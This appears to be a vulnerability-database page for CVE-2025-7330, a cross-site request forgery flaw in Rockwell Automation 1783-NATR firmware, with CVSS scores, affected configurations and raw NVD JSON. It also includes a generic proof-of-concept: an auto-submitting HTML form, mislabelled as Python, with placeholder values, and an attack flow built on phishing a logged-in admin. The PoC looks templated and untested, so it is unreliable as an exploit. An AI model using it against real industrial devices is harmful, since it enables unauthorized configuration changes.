Security Vulnerability Report
中文
CVE-2025-7330 CVSS 6.5 MEDIUM

CVE-2025-7330

Published: 2025-10-14 13:15:39
Last Modified: 2025-10-30 21:41:48
Source: [email protected]

Description

A cross-site request forgery security issue exists in the product and version listed. The vulnerability stems from missing CSRF checks on the impacted form. This allows for unintended configuration modification if an attacker can convince a logged in admin to visit a crafted link.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:* - NOT VULNERABLE
Rockwell Automation 相关产品(具体版本请参考官方安全公告SD1756)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-7330 CSRF Proof of Concept --> <!-- This PoC demonstrates a CSRF attack against Rockwell Automation product --> <!-- The attacker hosts this HTML page and tricks an authenticated admin into visiting it --> <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <h1>Please wait...</h1> <!-- Auto-submit form to modify configuration without CSRF token --> <form id="csrfForm" action="https://target-rockwell-product/config-endpoint" method="POST"> <input type="hidden" name="config_param1" value="malicious_value1" /> <input type="hidden" name="config_param2" value="malicious_value2" /> <input type="hidden" name="action" value="modify_config" /> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); </script> <!-- Alternative: IMG tag based CSRF for GET requests --> <!-- <img src="https://target-rockwell-product/config-endpoint?param=malicious_value" style="display:none" /> --> </body> </html> <!-- Attack Flow: 1. Admin logs into Rockwell Automation product management interface 2. Attacker sends phishing email/link containing this HTML page 3. Admin clicks the link while still authenticated 4. Browser auto-submits the form with admin's session cookies 5. Server processes the request without CSRF validation 6. Configuration is modified as attacker intended -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-7330", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:39.323", "lastModified": "2025-10-30T21:41:48.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site request forgery security issue exists in the product and version listed. The vulnerability stems from missing CSRF checks on the impacted form. This allows for unintended configuration modification if an attacker can convince a logged in admin to visit a crafted link."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.007", "matchCriteriaId": "37063188-4380-47A4-8179-50AACB1D9C4D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:*", "matchCriteriaId": "FEAE0B20-4A7B-4A7F-826E-A986A4CFE08D"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1756.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.